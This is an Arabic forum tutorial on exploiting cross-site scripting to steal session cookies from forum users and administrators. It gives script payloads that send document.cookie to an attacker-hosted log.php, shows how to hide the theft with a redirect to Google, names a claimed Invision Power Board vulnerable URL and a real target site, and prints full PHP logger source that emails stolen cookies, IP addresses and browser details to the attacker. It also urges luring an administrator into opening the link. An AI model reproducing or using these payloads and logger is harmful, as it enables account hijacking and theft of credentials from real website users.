شرح مبسط : استغلال ثغرات xss (موضوع مهم ) + تطبيق

شرح مبسط : استغلال ثغرات xss (موضوع مهم ) + تطبيق

السلام عليكم ورحمه الله وبركاته ,,

الان هذا اول درس لي بهذا القسم وهو يتكلم عن كيفيه استغلال ثغرات
xss

طيب نأتي الان الى الكود المهم في ثغرات xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss
كود PHP:
<Script>javascript:alert(document.******)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

تمام الان :
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
كود PHP:
   <Script>javascript:alert(document.******)</Script> 
بـ
كود PHP:
كود PHP:
[PHP]   <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script> 
[/PHP]

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
كود:
<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :
http://xxx.com/forums/index.php?act=idx='><script>alert(document.******) </script>
احنا راح نستبدل :
كود PHP:
كود:
<Script>javascript:alert(document.******)</Script>
بـ
كود PHP:
كود:
   <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

واستبدل هنا موقع جوجل باي موقع تبغاه

ورابط اللوج www.xxx.com/log.php باللوج تبعك

====================
تطبيق :

التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='><script>alert(document.******) </script>

===================
اللوج :
كود PHP:
كود:
<?php // Thnx For Security 4 Arab - http://www.s4a.cc - http://www.s4a.com/forum //----- S4a Logger v0.10 -----// // Star //Your Email --::-- $ToGet = "Linux_Drox@hotmail.com"; //////////////////////////////// $Ip = $REMOTE_ADDR; $Sys = $HTTP_USER_AGENT; ////////////////////////////////////////////// if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} // $Time = date("l dS of F Y h:i:s A"); $Hdr = 'From: Logger <logger@secourty>'; $Msg = ' Hi ,, Mr.Attacker :D ------------------------------------------- - Thnx For S4a ,, Security For Arab Forum - - s4a - - s4a froum - --------------------------------------------------------------------- - This Script Coded By Devil-00 [ Devil From Palestine ] - - <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> - --------------------------------------------------------------------- - IP ::- [ ' .$Ip.' ] - System ::- [ '.$Sys.' ] - The ****** ::- [ '.$id.' ] - Time ::- [ '.$Time.' ] --------------------------------------------------------------------- - root@devil00 ~ ./evilcat /etc/passwd - - root@devil00 ~ ./s4acracker passwd --log <log.log> && - --------------------------------------------------------------------- '; $send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr); // /* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */ if(isset($_GET["re"])){ $&@#&@#&@#&@#&@#&@#&@# = $_GET["re"]; if($&@#&@#&@#&@#&@#&@#&@# == ""){ mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr); }else{ header("location:".$&@#&@#&@#&@#&@#&@#&@#); } } // ?>
استبدل هنا :
كود PHP:
كود:
$ToGet = "Linux_Drox@hotmail.com";


واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك او على موقع لايكوس

وأخص بالشكر هنا لأخي العزيز Devil-00 لبرمجته هذا اللوج الأكثر من رائع صراحة

================
ملاحظه * :

انا لم اضع التطبيق الا لانه درس عملي فقط لا أكثر ..

وبإمكانك استغلاله بثغره xss تبع cPanel

وغيرها من ثغرات xss

وحملو كتاب القرصان عن ثغرات xss وفيه شفرات الـ hex التي تستخدم دائما في السكربتات الخبيثه وهي التي تطبق عن طريق المتصفح (( مهم جدا انك تعرف شفرات Hex )) لانها قد توصل لبريدك المعلومات على الشكل هذا .. 20% 60%
فكل من وحده لها معنا سوف تحصلونه بالكتاب للقرصان ..